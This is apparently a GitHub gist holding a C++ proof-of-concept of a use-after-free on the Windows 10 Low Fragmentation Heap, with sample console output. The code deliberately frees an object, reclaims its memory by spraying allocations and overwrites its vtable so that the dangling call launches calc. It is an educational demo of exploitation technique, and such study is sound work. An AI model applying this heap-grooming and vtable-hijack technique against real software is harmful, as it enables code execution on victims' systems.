Skip to content

Instantly share code, notes, and snippets.

@inaz2
Created June 3, 2017 08:44
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save inaz2/0c6edd5f485b95a114104fd48a533750 to your computer and use it in GitHub Desktop.
use-after-free on Low Fragmentation Heap (without /SDL, Windows 10, Visual Studio 2015)
C:\Users\user\Documents\Visual Studio 2015\Projects\20170603_ssmjp\Debug>20170603_ssmjp.exe
meow
[+] cat = 0121A9C8
[+] p[0] = 0121A928
[+] p[1] = 0121A838
[+] p[2] = 0121A9C8
[+] break after 3 times allocation
boom!
C:\Users\user\Documents\Visual Studio 2015\Projects\20170603_ssmjp\Release>20170603_ssmjp.exe
meow
[+] cat = 00B7CF90
[+] p[0] = 00B7D080
[+] p[1] = 00B7D0B0
[+] p[2] = 00B7D0E0
[+] p[3] = 00B7CF90
[+] break after 4 times allocation
boom!
#define WIN32_LEAN_AND_MEAN
#include <Windows.h>
#include <stdio.h>
class Cat {
char name[0x20];
public:
virtual void cry() { puts("meow"); };
};
void boom()
{
puts("boom!");
WinExec("calc", SW_SHOWNORMAL);
ExitProcess(1);
}
int main()
{
// enable LFH for size 0x24
void *p;
for (int i = 0; i < 0x12; i++) {
p = new char[0x24];
}
// must disable SDL checks (do not specify /SDL)
Cat *cat = new Cat();
cat->cry();
printf("[+] cat = %p\n", cat);
delete cat;
for (int i = 0; i < 0x100; i++) {
p = new char[0x24];
printf("[+] p[%d] = %p\n", i, p);
if (p == cat) {
printf("[+] break after %d times allocation\n", i + 1);
break;
}
}
// vtable overwrite
void (*ptr)() = boom;
*(void **)p = &ptr;
// use-after-free
cat->cry();
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment